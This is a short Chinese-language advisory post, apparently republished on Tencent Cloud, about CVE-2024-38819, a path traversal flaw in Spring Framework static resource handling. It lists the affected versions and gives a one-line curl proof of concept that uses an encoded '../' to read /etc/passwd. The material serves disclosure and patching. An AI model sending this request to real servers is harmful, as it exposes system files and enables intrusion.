首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >CVE-2024-38819|Spring Framework路径遍历漏洞(POC)

CVE-2024-38819|Spring Framework路径遍历漏洞(POC)

作者头像
信安百科
发布2025-07-30 14:39:18
发布2025-07-30 14:39:18
1.7K0
举报
文章被收录于专栏:信安百科信安百科

0x00 前言

Spring是Java EE编程领域的一个轻量级开源框架。

Spring 框架的核心特性是可以用于开发任何 Java 应用程序,但是在 Java EE 平台上构建 web 应用程序是需要扩展的。

Spring 框架的目标是使 J2EE 开发变得更容易使用,通过启用基于 POJO 的编程模型来促进良好的编程实践。

0x01 漏洞描述

通过功能型Web框架WebMvc.fn或WebFlux.fn提供静态资源的应用程序容易受到路径遍历攻击。攻击者可以构造恶意的HTTP请求,并获取运行Spring应用程序的进程也可访问的文件系统上的任何文件。

0x02 CVE编号

CVE-2024-38819

0x03 影响版本

Spring Framework 5.3.0 - 5.3.40

Spring Framework 6.0.0 - 6.0.24

Spring Framework 6.1.0 - 6.1.13

以及不受支持的旧版本。

0x04 漏洞详情

POC:

代码语言:javascript
复制
curl   http://x.x.x.x/static/link/%2e%2e/etc/passwd

0x05 参考链接

https://spring.io/security/cve-2024-38819

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-01-05,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 信安百科 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档